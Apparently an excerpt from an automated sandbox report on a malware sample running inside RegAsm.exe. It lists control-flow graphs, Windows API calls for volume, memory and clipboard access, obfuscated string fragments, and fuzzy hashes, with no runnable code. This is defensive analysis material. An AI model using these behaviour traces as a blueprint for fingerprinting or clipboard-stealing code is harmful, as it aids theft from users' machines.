                                                                                                                                              control_flow_graph 425 409240-40925c call 4092e0 call 436fd0 430 409260-409267 call 4321d0 425->430 431 40925e 425->431 435 409269 430->435 436 40926b-40929c GetStdHandle ExitProcess call 40a760 430->436 432 4092ae-4092ba ExitProcess 431->432 437 4092a5-4092ac call 4390c0 435->437 441 4092a0 call 410210 436->441 442 40929e 436->442 437->432 441->437 442->437
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 0040927D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
                                                                                                                                              • API String ID: 621844428-3137510881
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 606 43890c-43891a 607 438921-43892f call 4359f0 606->607 608 43891c-43891f 606->608 611 43896d-43897c 607->611 608->607 612 438983-4389c2 611->612 613 43897e-438981 611->613 614 438940-43896a RtlAllocateHeap 612->614 615 4389c8 612->615 613->612 614->611 616 4389d0-438a08 615->616 616->616 617 438a0a 616->617 617->614
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 0043894D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID: &QPS$+D
                                                                                                                                              • API String ID: 1279760036-1945338363
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 618 4340a8-4340ff call 439a30 GetVolumeInformationW
                                                                                                                                              APIs
                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004340E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InformationVolume
                                                                                                                                              • String ID: C$\
                                                                                                                                              • API String ID: 2039140958-514332402
                                                                                                                                              • Opcode ID: 1f089596534fe024055dce1adbee186e85238b9520941c24a8e10a22622ed5ef
                                                                                                                                              • Instruction ID: 0b16e51853d0470085fd2b4e6c78b332ddd4def9cb37a61542a3d6919008bdae
                                                                                                                                              • Opcode Fuzzy Hash: 1f089596534fe024055dce1adbee186e85238b9520941c24a8e10a22622ed5ef
                                                                                                                                              • Instruction Fuzzy Hash: DFE09275350741BBE728DF10EC27F1A3690D742744F10042CB242E91D0C7F57D108A5D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: !/$*
                                                                                                                                              • API String ID: 0-545799914
                                                                                                                                              • Opcode ID: ba954ffb2ea977e785fb344dc988f3a74d89b07fdf3ede9a299b4b895ee98fb9
                                                                                                                                              • Instruction ID: b2e27cbc9dde12e33a9927742966e6e389a792aa4b3f0ff258c4c825271f69ae
                                                                                                                                              • Opcode Fuzzy Hash: ba954ffb2ea977e785fb344dc988f3a74d89b07fdf3ede9a299b4b895ee98fb9
                                                                                                                                              • Instruction Fuzzy Hash: C4F13870205B918EE7268F35D4A47E3BBE1BF17304F84499DD4EB8B282C77AA405CB55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004266FC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                              • String ID: !/$*
                                                                                                                                              • API String ID: 3960555810-545799914
                                                                                                                                              • Opcode ID: e16e771a1d8e5cca60c9eee4cf03313e5d8a22d2944b828cb098f366c51c4bae
                                                                                                                                              • Instruction ID: 466006afd69678fcb0a440aae3b801bbbbe4bedcac6f7be2defe912c2a8870dc
                                                                                                                                              • Opcode Fuzzy Hash: e16e771a1d8e5cca60c9eee4cf03313e5d8a22d2944b828cb098f366c51c4bae
                                                                                                                                              • Instruction Fuzzy Hash: 1DD137B0205B918EE7258F35D4A47E3BBE1BF17304F84496DD4EB8B282C77AA405CB55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID: D1B7
                                                                                                                                              • API String ID: 1029625771-1785272153
                                                                                                                                              • Opcode ID: ba243289e261731e0f328ab571701020da0383182d802b1ebf38187e4b27abb8
                                                                                                                                              • Instruction ID: bda3516896a5f2ae45156be42eb04b2df876cef8185d1ab8fdc58d2902e9d8c2
                                                                                                                                              • Opcode Fuzzy Hash: ba243289e261731e0f328ab571701020da0383182d802b1ebf38187e4b27abb8
                                                                                                                                              • Instruction Fuzzy Hash: 722171B4518301ABD708DF10D9A171FBBE2FBCA708F14992CE48547351E7748D05DB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,00409E11), ref: 00435A87
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID: &QPS
                                                                                                                                              • API String ID: 1279760036-2176464483
                                                                                                                                              • Opcode ID: 69127a2621d4f876e4ea6e0d4522e800ef0ce33a1218fea6c99b8e6b414e8f95
                                                                                                                                              • Instruction ID: 3531a23c288a52d53f944b2c3e457840114f3fd3f8c40cca6c01df16574b446f
                                                                                                                                              • Opcode Fuzzy Hash: 69127a2621d4f876e4ea6e0d4522e800ef0ce33a1218fea6c99b8e6b414e8f95
                                                                                                                                              • Instruction Fuzzy Hash: B9114570108341AFD708CF04D8A0B6FBBE2FB85328F248A1DE8A507681C739D9199BC6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • KiUserCallbackDispatcher.NTDLL ref: 0042E6C5
                                                                                                                                              • GetSystemMetrics.USER32 ref: 0042E6D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallbackDispatcherMetricsSystemUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 365337688-0
                                                                                                                                              • Opcode ID: c25e3d91eaef95e72eee0b40d5d97d098b1fba32fea2081f15efa1ce194b10f2
                                                                                                                                              • Instruction ID: c70253705267066fe0a390eb40da1e2c454f4fe67f9f49903ef1b4541bef4a9f
                                                                                                                                              • Opcode Fuzzy Hash: c25e3d91eaef95e72eee0b40d5d97d098b1fba32fea2081f15efa1ce194b10f2
                                                                                                                                              • Instruction Fuzzy Hash: 5F319BB46197408FD750EF39D985A1ABBF0BB89304F40892EE998C73A0E731A945CF46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: 2ec94da7954408cfae29368b1fe2093eb4b36237cb70dc7a0dbd9c2afcbb8aec
                                                                                                                                              • Instruction ID: 1610e8cb5096fc1eed96c977c505dcc91df5b75474227e367c2d36b4526b057e
                                                                                                                                              • Opcode Fuzzy Hash: 2ec94da7954408cfae29368b1fe2093eb4b36237cb70dc7a0dbd9c2afcbb8aec
                                                                                                                                              • Instruction Fuzzy Hash: 00F0A574209340ABD708DB14D69099FFBE2AFCAA49F24881DE48583306C734EC43AE4A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004391B5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 59dc1c7f1cc53553e71521ab8106514bee450ab26b812539456e6df4fe94b9da
                                                                                                                                              • Instruction ID: da42185ebec8373d7b22ee920953178115992f0127cd58568fcf92c2ed0c5c99
                                                                                                                                              • Opcode Fuzzy Hash: 59dc1c7f1cc53553e71521ab8106514bee450ab26b812539456e6df4fe94b9da
                                                                                                                                              • Instruction Fuzzy Hash: 7B01D274508341AFE710CF14D88475BFBB2EBC6324F209E49E8A417695C3B5ED4A9B8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                                                                                                              • String ID: 7$8$I$K$L$N
                                                                                                                                              • API String ID: 3829817484-2422513041
                                                                                                                                              • Opcode ID: 6bd769e2c866ad362b282a4a0c33327f7ba68ca5a8274088656c9bed962daec9
                                                                                                                                              • Instruction ID: 8ed9dd40b2239205a4d96c9da8700085f56f38dffb9234c430860a7af855d13a
                                                                                                                                              • Opcode Fuzzy Hash: 6bd769e2c866ad362b282a4a0c33327f7ba68ca5a8274088656c9bed962daec9
                                                                                                                                              • Instruction Fuzzy Hash: 0F5190B0A04740CFC721DF39D585616BBE0AF16314F548AADE8D68F796D334E805CBA6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
                                                                                                                                              • API String ID: 0-3498391054
                                                                                                                                              • Opcode ID: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
                                                                                                                                              • Instruction ID: 62964ce6587a9f6e8b4bc72a90dd2b3cf09b0a553c01e9630c29236c2bf44c9c
                                                                                                                                              • Opcode Fuzzy Hash: 15b7895d50192fbd9e2686c79026486b2693e9a6a391717bdcf467abc5fd23ba
                                                                                                                                              • Instruction Fuzzy Hash: D852FCB0205B858FE325CF25D494BD7BBE1BB06348F50892EC4EB5B645CB74A14ACF92
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: "u w$)m:o$.q#s$4i:k$8a)c$GC$H{$Ny0{$[J$bD$x!\'$)/
                                                                                                                                              • API String ID: 0-3498391054
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: u=w$3yZ{$8MnO$9aBc$:m:o$Hik$M-q/$hI4K$u!|#$~w$q$s
                                                                                                                                              • API String ID: 0-1478902827
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID: ##*8$&>95$)5>Q$7&"4$8C$rr}t$4f
                                                                                                                                              • API String ID: 1279760036-3888404133
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: "frc$#m8j$&zqi$=ksw$deks
                                                                                                                                              • API String ID: 0-420180677
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: R-,T$R-,T$gxyz
                                                                                                                                              • API String ID: 0-1473045628
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: /9++$756.
                                                                                                                                              • API String ID: 0-2948954884
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: ?mlk
                                                                                                                                              • API String ID: 0-3660313571
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: JAF
                                                                                                                                              • API String ID: 0-4103162853
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 789:
                                                                                                                                              • API String ID: 0-2924019492
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              • Instruction Fuzzy Hash: BB114C33A051E40EC7168D3C8A00565BFA31AD7234F1D539AF4B49B2D2D6278D8B8369
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e85327cca07778d5fa5c6387c8ed6258d52b71aa4bff88396f83fddc4650c8f7
                                                                                                                                              • Instruction ID: 7589fa0b55ddb035dc5953139a33f16b58e0856eb98253357792a4a2099d3379
                                                                                                                                              • Opcode Fuzzy Hash: e85327cca07778d5fa5c6387c8ed6258d52b71aa4bff88396f83fddc4650c8f7
                                                                                                                                              • Instruction Fuzzy Hash: 7511E2B04193418BD718DF14C0A066BBBF1EF8A344F545E0EE8E29B240D339D6069B5A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
                                                                                                                                              • Instruction ID: 5fc0ae8dc96022c44960700c7ab2adaf62af461dc2bf8e2718f495d239de32d0
                                                                                                                                              • Opcode Fuzzy Hash: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
                                                                                                                                              • Instruction Fuzzy Hash: 2EF06735A083019BC708CF19C09062BFBF0AF8A750F28986EA4D9D3351DB30ED558B46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                                                                                                                                              • Instruction ID: b4944c70536aa93040e23a0d3de02e03ae6e0bd8259874742134aa93b1285e44
                                                                                                                                              • Opcode Fuzzy Hash: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                                                                                                                                              • Instruction Fuzzy Hash: A7E0C266B057610BA718CDB548A01B7F7E55A87322F1CA4BED492E3244C13CC805425C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
                                                                                                                                              • Instruction ID: 832b43b70c8be9becace1e9a524aaac1633fa4a646e66cb56c40eb57a0982910
                                                                                                                                              • Opcode Fuzzy Hash: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
                                                                                                                                              • Instruction Fuzzy Hash: CAC04C249440015A81199B15DDE5879B3796687945740743CD90BD3260DB14E409991D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
                                                                                                                                              • Instruction ID: 8b35dc4ed4a9966cb47b13b221a0358a275917a8b9a254330dbaa609285bd0fa
                                                                                                                                              • Opcode Fuzzy Hash: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
                                                                                                                                              • Instruction Fuzzy Hash: 72C04C3CBAD240978348CF00D990875F77AE78B212B19B12DEC5513325D534E886850C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
                                                                                                                                              • Instruction ID: b9894db37ae32ee18a48b4ed2c803f881acc9e4ff8f0547e5b61e8919c04ec24
                                                                                                                                              • Opcode Fuzzy Hash: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
                                                                                                                                              • Instruction Fuzzy Hash: DBB002B8E58305AF8704DE25D480826F7F0AB5A260F11B859A495E7221D235D840CE59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SysStringLen.OLEAUT32 ref: 00429E9E
                                                                                                                                                • Part of subcall function 004359F0: RtlAllocateHeap.NTDLL(?,00000000,00409E11), ref: 00435A87
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeapString
                                                                                                                                              • String ID: ,$0$7
                                                                                                                                              • API String ID: 983180023-2155719752
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:36.4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:41
                                                                                                                                              Total number of Limit Nodes:2
